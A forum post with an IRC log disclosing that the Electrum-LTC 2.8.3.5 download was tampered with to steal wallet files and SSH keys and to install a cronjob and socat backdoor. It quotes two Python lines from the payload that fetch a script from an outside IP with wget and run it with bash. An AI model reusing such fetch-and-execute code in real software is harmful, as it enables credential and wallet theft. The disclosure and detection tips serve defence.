I know this account is new and the following will therefore may seem a bit like a smear campaign against the electrum-ltc dev. I can guarantee that the following statements are true and everything happened as described.
On July 30 I tried to install electrum-ltc but stopped in the process because the checksums were missing (404 Not Found).
On July 31 I tried again. This time the checksums (available in Electrum-LTC-2.8.3.5.tar.gz.DIGESTS.txt) were available. The checksums didn't match the downloaded archive!
Due to this mismatch I compared the download to the version available @ github.com.
My Result: Electrum-LTC-2.8.3.5.tar.gz (available at
https://electrum-ltc.org/download/Electrum-LTC-2.8.3.5.tar.gz) was modified to download a shell script. This shell script proceeds to collect various files (wallet data for various wallets and ssh-keys) and sends them to a server. Additionally it installs a cronjob and a backdoor (based on socat).
As far as I know this issue only affects Unix/Mac users but I can't guarantee that there aren't payloads for other operating systems.
I've informed pooler (the electrum-ltc dev) at the irc and he confirmed that the files were tampered. Currently the downloads are restored to a clean state. Sadly it seems like the developer didn't see any reason to inform his users about the issue. It looks like there is now a new hint reading "Always verify the digital signatures of the files you download!" (it wasn't there before:
Proof)
Affected (Linux/Mac) users should be able to identify the infected electrum file by searching for 'import subprocess' or identify infected systems by checking their cronjobs.
Please don't ignore this post because my account is newly created. Members of #electrum-ltc or affected users should be able to confirm this report.
IRC log:
(18:39:45) got_inf3cted: Hello. Is it possible that
https://electrum-ltc.org/download/Electrum-LTC-2.8.3.5.tar.gz is currently infected?
(18:59:29) skace: wait for pooler to respond
(18:59:38) skace: define infected
(19:00:58) pooler: got_inf3cted: what makes you think that?
(19:01:12) pooler: also, that's the source tarball, it's not even executable.
(19:02:00) got_inf3cted: The checksums aren't matching
(19:02:31) got_inf3cted: And of course:
(19:02:31) got_inf3cted: > subprocess.Popen(["wget", "
http://80.67.8.195/script", "-O/tmp/script"], stdin=subprocess.PIPE, stderr=subprocess.PIPE)
(19:02:31) got_inf3cted: > subprocess.Popen(["bash", "/tmp/script"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
(19:02:55) skace: oh nice
(19:03:39) pooler: let me check
(19:04:05) got_inf3cted: The checksum file was unavailable yesterday. Today it is restored (and unchanged) but the .tar.gz is moddified
(19:06:18) skace: got hacked?
(19:19:43) got_inf3cted: How are your checks going pooler?
(19:20:39) skace: i assume he is busy now
(19:20:41) skace: let him be
(19:22:25) got_inf3cted: It should be quite easy to confirm my findings and report back and take down the downloads/pages/servers (if needed)
(19:29:53) pooler: sorry, i have quite a few things on my plate
(19:30:09) pooler: the file was indeed compromised, trying to understand how
Show Posts
